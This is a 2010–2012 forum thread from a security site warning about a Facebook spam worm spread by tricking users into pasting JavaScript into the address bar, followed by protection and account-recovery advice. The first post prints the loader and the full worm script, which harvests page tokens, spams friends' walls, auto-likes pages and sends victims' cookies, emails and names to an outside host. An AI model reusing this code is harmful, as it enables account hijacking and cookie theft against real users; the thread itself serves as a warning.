Welcome Guest! To enable all features please try to register or login.
Facebook Spamming - Jungle Fire
Share
Options
Go to last post Go to first unread
Previous Topic Next Topic
Offline Dr-Hack  
#1 Posted : Sunday, November 28, 2010 8:33:21 PM(UTC)
Retweet
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)
EDIT :  ​Feb 2012 - Still People are being infected with such techniques please read my #11 Post on how to solve this ISSUE ...

Facebook SPAM

You get a wall post by some of your friend saying some revolving image , new theme thing is out view the link to enjoy it

you open that site ...
the site asks you to copy some JavaScript code like ...
Code:
javascriptSada = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)

and when you post it in your Facebook account Address bar...
thats it you start spamming .. and the Fire keeps increasing ..

Some of the DOMAINS you should not visit if you see in a post :

http://fbpictures.tk
http://imaginemonkeys.com/fb/
http://fbimages.tk
http://fbookcoolimages.tk/
http://herohide.com/browse.php?
http://www.revolvingimages.info/fb/
http://revolvingimages2.tk/
http://graphicgiants.com/
http://zizz.co.tv/

New domains keep coming ....


HOW TO STOP IT ?
To stop it spamming to your wall simply re-generate your mobile email unique address at http://www.facebook.com/mobile/ clean out your cookies and don't be copy/pasting javascript into your browser again!

UPDATE: Also remove the Application which you allow by mistake and view the Youtube Video Here
Which i have made so you can easily understand what i mean by "Re-generate your mobile email unique address"



The Script which runs inside the JS(which is mostly majic.js or the index.php file is :
Code:
// script name : whitebeard

// author : orkut.com/Community.aspx?cmm=43558952

txt = "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/";

txtee = "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/";



alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");



with(x = new XMLHttpRequest())

open("GET", "/"), onreadystatechange = function () {



if (x.readyState == 4 && x.status == 200) {

comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];

form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];

pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

appid = "150622878317085";

appname = "rip_m_j";



with(xx = new XMLHttpRequest())

open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"),

onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {

m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");

i = 0; llimit=25;

t = setInterval(function () {

if (i >= llimit ) return;

if(i == 0) {

with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),

setRequestHeader("X-Requested-With", null),

setRequestHeader("X-Requested", null),

onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\"Sad[\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }

}, send(null);

with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

with(llxlxlxlxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

} else if (i == llimit - 1) {

with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"),

setRequestHeader("X-Requested-With", null),

setRequestHeader("X-Requested", null),

onreadystatechange = function(){

if(xxxx.readyState == 4 && xxxx.status == 200){

with(s = document.createElement("script")) src = "http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailtoSad[^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }

}, send(null);

}

if(i%2==0) {

with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");

}

else {

with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest"); } i += 1;

}, 2000); }

}, send(null);

}

}, send(null);


UserPostedImage
Back to top
WWW
Sponsor
Back to top  
Offline Dr-Hack  
#2 Posted : Sunday, November 28, 2010 10:54:07 PM(UTC)
Retweet
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)
Great now we have such Applications in Facebook

one Application which is just popping up is Profile Privacy v1.2 ... so please remember this is a FAKE APPLICATION and use such comments on other users wall :

Quote:
OMG OMG OMG... I cant believe this actually works! Now you really can see who viewed your profile! on http://bit.ly/9rVvrN


This app already has 300 users who have liked this App, don't so this fire will also spread like hell ...

and user visits doesnt work in facebook till to date.
UserPostedImage
Back to top
WWW
Offline Hackills  
#3 Posted : Monday, November 29, 2010 6:10:48 PM(UTC)
Retweet
Hackills


Rank: Hackology Applicant
Reputation:
Joined: 11/29/2010(UTC)
Posts: 1
Informative! Thanks for sharing Smile
Back to top
Offline Dr-Hack  
#4 Posted : Monday, November 29, 2010 9:03:07 PM(UTC)
Retweet
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)
Hackills wrote:
Informative! Thanks for sharing Smile


Thats what we here for Cool

Making you do >:eangry
UserPostedImage
Back to top
WWW
Offline Dr-Hack  
#5 Posted : Saturday, December 04, 2010 5:20:50 PM(UTC)
Retweet
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)
Updated post with a YouTube video for easy reference
UserPostedImage
Back to top
WWW
Offline deatheater  
#6 Posted : Monday, December 06, 2010 1:20:01 PM(UTC)
Retweet
deatheater


Rank: Lieutenant Wardriving
Reputation:
Joined: 5/2/2006(UTC)
Posts: 68
sup dr hack.

do u still remember me?

anyway
Code:
// author : orkut.com/Community.aspx?cmm=43558952


shhh...!!!! Evilthreat
Death Eater.

http://www.orkut.com/CommTopics.aspx?cmm=18256080
Back to top
Offline Dr-Hack  
#7 Posted : Monday, December 06, 2010 3:49:08 PM(UTC)
Retweet
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)
deatheater wrote:
sup dr hack.

do u still remember me?

anyway
Code:
// author : orkut.com/Community.aspx?cmm=43558952


shhh...!!!! Evilthreat


Yes, still remember you .. you dont come here doesnt mean i'll forget tongue :p

lolz, yeah OUG comeback eh, but losing track of oug now .
getting old i guess

nice to see you again ..

Takecare
UserPostedImage
Back to top
WWW
Offline Dr-Hack  
#8 Posted : Tuesday, December 13, 2011 4:46:31 AM(UTC)
Retweet
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)

SO now we have another Facebook Spam showing various links to video and thats the game , the concept is same just a new make over..

 but this time i will not go into details of anything .. reason  ? .. everyone is not keen to know the details I will only share all round steps to keep you out of such issues everytime they occur.

11 Steps to Protect your Account from All sorts of Spamming. 

1. Be Sensible.        Well, thats the most Important thing be sensible before clicking here and there ... this will save you from all the mess .. thats what I do. ...

2. Password Change        If you fell victim to a phishing scheme or another hack attack, it's likely that someone else has obtained your password and is using it to access your account. You'll need to change your login credentials ASAP. Visit Facebook's Account Settings to do this. Remember, don't reuse passwords on different accounts and the more complex the password, the safer you'll be.

3. Identity Verify     If you believe someone has gained access to your Facebook profile and is posting unauthorized content in your name, Facebook's Roadblock tool can help verify your identity and secure your account against the spammer.

4. Login Approvals    One of Facebook's new security features will implement a two-step login process the first time your account is accessed from an unfamiliar device. If you enable this feature, Facebook will send a verification text to your mobile device before allowing access from the new location. You can save or block the new device via your handset. If a foreign device fails to log in, Facebook will notify you when you next log in from one of your approved devices and will give you the option of resetting your password if you suspect foul play.

5. Remove Dirty Apps     When you approve a normal app, you "allow" the app access to your profile, trusting that the developers will post only updates about your in-app activities. However, spammers will use this open door to take over your profile. If you fell for a rogue app and mistakenly clicked "Allow," or if you notice excessive activity on your account, you should edit your list of apps and remove any suspicious ones. To do this, open the drop-down box under your Account tab, click "Privacy Settings" and find the "Apps and Websites" settings management tool (at the bottom of the page). This tool will help you manage your apps and the kind of information they can access. Your Apps Page lets you turn off all platform apps or remove/edit each app individually. It's a good idea to use this tool every now and again, since apps tend to pile up over time.

6. Delete Spam    As soon as you can, delete spammy posts from your wall and Facebook inbox. The fewer there are, the less likely you or your friends will be to click on them.

7. Like the Likable     If you were tricked into "Liking" a scam, you'll need to edit your interests on your profile and remove any links to spam sites you may have acquired.

8. Inform Facebook   If you suspect your account has been compromised, you can alert Facebook through several channels. To report privacy breaches, you can direct reports to [email protected]. If a scammer gained access to your account password via phishing attack, you can fill out Facebook's phishing report. Facebook also provides a separate form for reporting a malicious link or website

9. Scan the Machine     Facebook recommends that you scan your computer hard drive for malicious software that could potentially tap into your profile again. If you don't have an antivirus app, Facebook suggests using a free trial of McAfee.

10. Terminate Session    If you've entered a line of malicious code into your browser and believe that someone has taken control of your profile and is in the process of spamming your friends, log out of Facebook to stop the attack. One of Facebook's new security features may also notify you of suspicious activity on your account, such as excessive "Likes" or posts. 

11. Be Informed    You can Keep yourself abreast by staying connected with Hackology via various methods .. You can Join our Facebook Group( or Page?), Follow us on Twitter or be at the Blog and during issues post in this Forum ..

UserPostedImage
Back to top
WWW
Offline kool  
#9 Posted : Friday, December 30, 2011 4:09:05 PM(UTC)
Retweet
kool


Rank: Colonel Intelligence
Reputation:
Joined: 12/4/2010(UTC)
Posts: 103

Thanks: 13 times
Was thanked: 10 time(s) in 8 post(s)
nicee ... i like the first point "be sensible" tongue :p
Back to top
Offline Dr-Hack  
#10 Posted : Tuesday, January 31, 2012 7:03:42 PM(UTC)
Retweet
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)
This thing is still not down its still running Sad .. when will this end ..its a MESS
UserPostedImage
Back to top
WWW
Offline Dr-Hack  
#11 Posted : Sunday, February 12, 2012 2:48:48 PM(UTC)
Retweet
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)
The Virus Thing is Back again with objectionable videos getting posted onto users wall and it tags all the friends of that user so let me share another simple method to cure it the above protection steps still hold Valid..
This Technique was shared by Mdnurhfz on How to Remove The Facebook Spam Virus of my Channel .

 

1) Go to 'Account Settings'.

2) Click on 'Security'.

3) Then look at the bottom there is this 'Deactivate your account' typed. Click on that.

4) It will bring you to a new page. Then, you'll see 'Reason for leaving'. So pick this 'I got hacked'.

5) A yellow box will appear saying 'Secure your account here.'

6) Click on 'here' then follow the instructions.

7) After that, thank God Smile


Or you can simply open Http://Facebook.com/Hacked and follow the Instructions to secure your account
 

UserPostedImage
Back to top
WWW
thanks 3 users thanked Dr-Hack for this useful post.
Offline wiki117  
#12 Posted : Monday, February 13, 2012 3:36:10 PM(UTC)
Retweet
wiki117


Rank: Hackology Applicant
Reputation:
Joined: 2/13/2012(UTC)
Posts: 1

Thanks: 1 times
Originally Posted by: Dr-Hack Go to Quoted Post
The Virus Thing is Back again with objectionable videos getting posted onto users wall and it tags all the friends of that user so let me share another simple method to cure it the above protection steps still hold Valid..
This Technique was shared by Mdnurhfz on How to Remove The Facebook Spam Virus of my Channel .

 

1) Go to 'Account Settings'.

2) Click on 'Security'.

3) Then look at the bottom there is this 'Deactivate your account' typed. Click on that.

4) It will bring you to a new page. Then, you'll see 'Reason for leaving'. So pick this 'I got hacked'.

5) A yellow box will appear saying 'Secure your account here.'

6) Click on 'here' then follow the instructions.

7) After that, thank God Smile


Or you can simply open Http://Facebook.com/Hacked and follow the Instructions to secure your account
 



IT REALLY WORKS 
Back to top
Offline Niazi  
#13 Posted : Tuesday, February 21, 2012 11:05:15 AM(UTC)
Retweet
Niazi


Rank: Hackology Applicant
Reputation:
Joined: 2/19/2011(UTC)
Posts: 2

I stand much learned O dear DrHack.

 

Thanks for the wonder ful adviceGood Post

 
Back to top
Rss Feed  Atom Feed
Users browsing this topic
Guest
Similar Topics
Facebook Spamming - Jungle Fire (Other - Question)
by Dr-Hack 11/28/2010 8:33:21 PM(UTC)
You cannot post new topics in this forum.
You cannot reply to topics in this forum.
You cannot delete your posts in this forum.
You cannot edit your posts in this forum.
You cannot create polls in this forum.
You cannot vote in polls in this forum.

Notification

Icon
Error